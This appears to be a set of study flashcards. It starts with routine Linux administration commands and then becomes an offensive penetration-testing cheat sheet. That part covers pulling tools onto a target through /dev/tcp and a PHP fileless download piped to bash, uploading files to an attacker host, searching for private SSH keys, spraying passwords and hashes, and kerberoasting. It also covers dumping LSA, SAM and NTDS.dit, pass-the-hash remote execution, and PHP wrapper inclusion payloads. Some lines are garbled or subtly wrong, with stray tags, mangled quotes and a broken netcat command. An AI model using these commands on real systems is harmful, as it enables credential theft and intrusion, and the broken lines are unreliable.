Useful Linux Commands Flashcards
You must know all of these 100%
Show system information
uname -a
Display memory usage
free -h
Show disk space usage
df -h
Show disk usage per directory
du -sh [directory]
Show running processes
ps aux
Show real-time system resource usage
top
Interactive system monitoring tool
htop
Show system uptime and load average
uptime
Display last system boot time
who -b
Show currently logged-in users
who
Show last login history
last
Check system logs
journalctl -xe
Show kernel logs
dmesg
Display open network connections
netstat -tulnp
Display listening ports
ss -tulnp
Display current network interfaces and IP addresses
ip a
Restart a service
systemctl restart [service]
Stop a service
systemctl stop <service></service>
Start a service
systemctl start [service]
Enable a service to start on boot
systemctl enable [service]
Disable a service from starting on boot
systemctl disable [service]
Check service status
systemctl status [service]
List all active services
systemctl list-units –type=service
Show disk partitions
lsblk
Show detailed partition information
fdisk -l
Mount a filesystem
mount [device] [mount_point]
Unmount a filesystem
umount <mount_point></mount_point>
Check disk health (SMART)
smartctl -a /dev/sdX
Create a new user
useradd -m [username]
Delete a user
userdel -r [username]
Change user password
passwd [username]
Add a user to a group
usermod -aG [groupname] [username]
Show group memberships for a user
groups [username]
Show system resource limits
ulimit -a
Monitor real-time system logs
tail -f /var/log/syslog
Shut down the system immediately
shutdown -h now
Reboot the system
reboot
Securely delete a file
shred -u [file_name]
List files in a directory
ls -lah
Change directory
cd [directory]
Create a new directory
mkdir [directory]
Remove an empty directory
rmdir <directory></directory>
Remove a directory and its contents
rm -rf [directory]
Copy a file
cp [source] [destination]
Move or rename a file
mv [source] [destination]
Create a new empty file
touch <file_name></file_name>
View file contents
cat [file_name]
Display file contents with pagination
less <file_name></file_name>
Show the first 10 lines of a file
head <[file_name]
Show the last 10 lines of a file
tail <file_name></file_name>
Find files by name
find /path/to/search -name “[file_name]”
Find files larger than 1GB
find / -size +1G
Search for a string inside files
grep “pattern” [file]
Search recursively in directories
grep -r “pattern” /path/to/directory
Show file type
file [file_name]
Change file permissions
chmod 755 [file_name]
Change file ownership
chown user:group [file_name]
Compress a file with gzip
gzip [file_name]
Decompress a gzip file
gunzip [file_name.gz]
Compress a file with bzip2
bzip2 [file_name]
Decompress a bzip2 file
bunzip2 [bzip file]
Create a tar archive
tar -cvf archive.tar [directory]
Extract a tar archive
tar -xvf archive.tar
Create a compressed tar.gz archive
tar -czvf archive.tar.gz [directory]
Extract a tar.gz archive
tar -xzvf archive.tar.gz
Create a compressed tar.bz2 archive
tar -cjvf archive.tar.bz2 [directory]
Extract a tar.bz2 archive
tar -xjvf archive.tar.bz2
How to use scp?
scp [user]@[remote ip]:/path/to/file
How to add something to $PATH?
export PATH=”[new path to add]:$PATH”
How to port forward SSH
ssh -L [lport]:[lhost]:[rport] [user]@[rhost]
How to search for ssh keys on a system
grep -rnw “PRIVATE KEY” /* 2>/dev/null | grep “:1”
How to manually make http request
exec 3<>/dev/tcp/[ip]/[port]
echo -e “GET /LinEnum.sh HTTP/1.1\n\n”>&3
cat <&3
How to make a python https upload server which takes POST
python3 -m virtualenv . && sudo python3 -m pip install –user uploadserver && openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj ‘/CN=server’ && sudo python3 -m uploadserver 443 –server-certificate ~/server.pem
How to start an SSH server
useradd -m [username]
sudo systemctl enable sshd
How to start a python3 http server?
python3 -m http.server
How to start a python2 http server?
python2.7 -m SimpleHTTPServer
How to start a PHP http server?
php -S 0.0.0.0:8000
How to start a ruby http server?
ruby -run -ehttpd . -p8000
How to GET with http python2
python2.7 -c ‘import urllib;urllib.urlretrieve ([url])’
How to GET with http python3
python3 -c ‘import urllib.request;urllib.request.urlretrieve([url],[out file name]”)’
How to POST with http python3
python3 -c ‘import requests;requests.post(“http://<attack>:8000/upload",files={"files":open(<filename>,"rb")})'</filename></attack>
How to start a python3 http upload server?
python3 -m virtualenv . && python3 -m uploadserver
How to GET with http PHP?
php -r ‘$file = file_get_contents([url]); file_put_contents([outfile name],$file);’
How to GET with PHP fopen()?
php -r ‘const BUFFER = 1024; $fremote =
fopen([url], “rb”); $flocal = fopen([out file name], “wb”); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);’
How to do fileless download PHP?
php -r ‘$lines = @file([url]); foreach ($lines as $line_num => $line) { echo $line; }’ | bash
How to GET with http ruby?
ruby -e ‘require “net/http”; File.write([outfile name], Net::HTTP.get(URI.parse([url])))’
How to GET with http perl?
perl -e ‘use LWP::Simple; getstore([url], [outfile name]);’
How to upload file with netcat?
cat [file] > nc [ip] [port]
How to download file with netcat?
nc -nvlp [port] > [out_file]
How to upload file with ncat?
ncat –send-only [target ip] 8000 < file-to-transfer.txt
How to upload
To create a certificate on a target machine:openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
run this on attacking machine:openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
Download the file from target machine:openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh
How to start a python3 ftp server for downloading?
python3 -m virtualenv . && sudo pip3 install pyftpdlib && sudo python3 -m pyftpdlib –port 21
How to start a python3 ftp server for uploading?
python3 -m virtualenv . && sudo pip3 install pyftpdlib && sudo python3 -m pyftpdlib –port 21 –write
How to mount a filesystem with rdp rdesktop?
rdesktop [hostname] -d [domain] -u [user] -p [pass] -r disk:linux=[path]
How to mount a filesystem with rdp xfreerdp?
xfreerdp /v:[hostname] /d:[domain] /u:[user] /p:[pass] /drive:linux,[path]
How to start rlogin session?
rlogin [ip] -l [user]
How to pull all files in an rsync share?
rsync -av rsync://[hostname]/[share]
How to list contents of an rsync share?
rsync -av –list-only rsync://[hostname]/[share]
How to connect to oracledb service?
sqlplus [user]/[pass]@[oracledb server ip]/[sid]
How to connect to an ftp server?
ftp [user]@[ip] [port]
How to connect to an ftp server in passive mode?
ftp [user]@[ip] [port] -p
How to mount an NFS share?
sudo mkdir /mnt/target-NFS && sudo mount -t nfs [ip]:/ /mnt/target-NFS/ -o nolock
How to unmount an NFS share?
cd /mnt && sudo umount ./target-NFS
How to connect to an SMTP server?
telnet [ip] 25
How to login to SMTP from commandline?
AUTH LOGIN
give base64 encoded creds
How to compose an email via command line?
MAIL FROM:[emai;]
RCPT TO:[email]
DATA
Subject: [subject]
From: [email]
To: [email]
body of email
.
How to log out from SMTP server?
QUIT
How to connect to mysql?
mysql -u [user] -h [ip] -p [pass]
How to check domain info for linux domain joined host?
realm list
How to kerberoast with impacket
GetUserSPNs.py [Domain/Username:password] -dc-ip [dc_ip] -request
How to kerberoast on domain joined machine rubeus?
Rubeus.exe kerberoast
How to check if smbexec is enabled with smbmap?
smbmap -H $ip -u [username] -p [password] -x “whoami”
how to map an smb share with smbmap?
smbmap -H [ip] -u [username] -p [password] -r [share name]
How to spray passwords for AD users?
nxc smb [host] -u [wordlist of users] -p [password wordlist] –continue-on-success
How to spray hashes for AD users?
nxc smb [host] -u [wordlist of users] -H [hash list] –continue-on-success
How to check if smb exec is enabled with nxc?
nxc smb [ip] -u [user] -d [doamin] -p [pass] -x whoami
How to check if smb exec is enabled with nxc and execute command with local admin?
nxc smb [ip] -u [user] -d [doamin] -p [pass] -x whoami —local-auth
How to enumerate smb shares with nxc?
crackmapexec smb [ip] -u [user] -p [pass] –shares
How to enumerate domain users with rid brute?
nxc smb $ip -u [user] -p [pass] –rid-brute
How to remotely dump lsa?
crackmapexec smb [ip] –local-auth -u ‘admin’ -p [pass] –lsa
How to remotely dump SAM?
crackmapexec smb [ip] –local-auth -u ‘admin’ -p [pass] –sam
How to remotely dump NTDS.dit
crackmapexec smb [ip] -u [user] -p [pass] –ntds
How to remotely execute commands with wmi?
wmiexec.py [user]:[pass]@[ip] [command]
How to remotely execute commands with wmi by passing a hash?
python3 wmiexec.py [user]:[pass]@[ip] -hashes [hash] [command]
How to psexec remotely?
python3 psexec.py [user]:[pass]@[ip] [command]
How to find AS-REP roastable users?
ldapdomaindump -u ‘[doamin][user]’ -p [pass] [ip]
How to AS-REP roast with user list?
python3 GetNPUsers.py -dc-ip [ip] [domain]/ -usersfile users.txt
How to crack AS-REP roast hashes?
hashcat -m 18200 [hashes] [wordlist] –force
How to set up an NTLM relay smb server? 1
python3 ntlmrelayx.py -smb2support -o hashfile
How to set up an NTLM relay smb server? 2
impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp
How to enumerate AD Users using smb exec?
python3 GetADUsers.py [domain]/[user]:[pass] -dc-ip [ip]
How to enumerate AD Users using smb exec by passing the hash?
python3 GetADUsers.py [domain]/[user]@[ip] -hashes [hash]
How to mount an smb share
sudo mount -t cifs -o username=plaintext,password=[pass],domain=. //[ip]/[share] /mnt/share
How to mount an smb share with a credential file
mount -t cifs //[ip]/[share] /mnt/share -o credentials=/path/credentialfile
How to connect to an MSSQL database remotely?
sqsh -S [ip] -U [user] -P [pass]
How to restart apache?
sudo systemctl restart apache2
How to use php filter to include a php file
php://filter/read=convert.base64-encode/resource=/index/php
How to use data wrapper php
?file=data://text/plain;base64,<base64_payload?
How to use input wrapper php
file=input://, payload in body
How to use zip wrapper php
file=zip://path/to/zip#path/to/file
